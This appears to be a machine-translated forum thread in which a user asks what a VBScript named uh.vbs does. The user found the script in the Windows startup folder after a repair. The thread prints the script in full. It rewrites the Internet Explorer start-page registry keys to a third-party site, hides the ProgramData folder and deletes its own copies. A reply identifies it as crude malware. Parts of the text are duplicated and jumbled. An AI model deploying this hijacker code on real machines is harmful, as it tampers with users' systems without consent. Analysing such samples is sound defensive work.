Vbscript 这个名为uh.vbs的Visual Basic Sript做什么?
不久前,我把电脑送去做一些非保修工作(BIOS无法识别我的一个硬盘托架),当它带着新的硬盘板回来时,我在重新启动时遇到了一个奇怪的错误 最后,我发现Windows启动文件夹中有一个新文件,名为“uh.vbs”,在启动时运行时出错。不知道任何关于vbs的事情,我不知道这个文件是做什么的,除了它是在我的电脑在修理厂时创建或修改的。我注意到它指向了几个网页,并且有一些中文字符,所以我希望这个网站上的一位经验丰富的人能告诉我。下面是代码 编辑:我不得不拿出一大堆,因为一个奇怪的错误显然是由汉字引起的,这个错误没有被网站识别出来,我花了半个小时才最终弄明白。我删除了那些看起来像中国人的字符,把丢失的中文证书放在我拿出来的地方Vbscript 这个名为uh.vbs的Visual Basic Sript做什么?,vbscript,Vbscript,不久前,我把电脑送去做一些非保修工作(BIOS无法识别我的一个硬盘托架),当它带着新的硬盘板回来时,我在重新启动时遇到了一个奇怪的错误 最后,我发现Windows启动文件夹中有一个新文件,名为“uh.vbs”,在启动时运行时出错。不知道任何关于vbs的事情,我不知道这个文件是做什么的,除了它是在我的电脑在修理厂时创建或修改的。我注意到它指向了几个网页,并且有一些中文字符,所以我希望这个网站上的一位经验丰富的人能告诉我。下面是代码 编辑:我不得不拿出一大堆,因为一个奇怪的错误显然是由汉字引起的,这
On Error Resume Next
set lhwy=createobject("wscript.shell")
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
WScript.Sleep(30000)
set lhwy=createobject("wscript.shell")
path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") Then
fso.DeleteFile("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if
Wscript.quitPAPK
感谢您的支持。这似乎是一个相对较差的恶意软件尝试 此位正在尝试将IE起始页设置为
http://home.yy8000.com/path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
set path=nothing
path="HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
tf=lhwy.regwrite(path,"http://home.yy8000.com/")
ProgramData如果您在将电脑送去保修之前没有安装病毒检测程序,请查看卡巴斯基的live CD。有人知道我如何用中文文本发布缺失的行吗?您能不能将它们放入
Dim objws,objfso,dn
Set objws=WScript.CreateObject("wscript.shell")
Set objfso=CreateObject("scripting.filesystemobject")
dn=objfso.GetDriveName(WScript.ScriptFullName)
objws.run "attrib +h " & dn & "\ProgramData",0
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 3000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") Then
fso.DeleteFile("\Documents and Settings\All Users\「MISSING_CHINESE_CHARACTERS\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if
Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Sleep 1000 'MISSING_CHINESE_CHARACTERS
fso.DeleteFile(WScript.ScriptName) 'MISSING_CHINESE_CHARACTERS
If fso.FileExists("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") Then
fso.DeleteFile("\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uh.VBS") 'MISSING_CHINESE_CHARACTERS
end if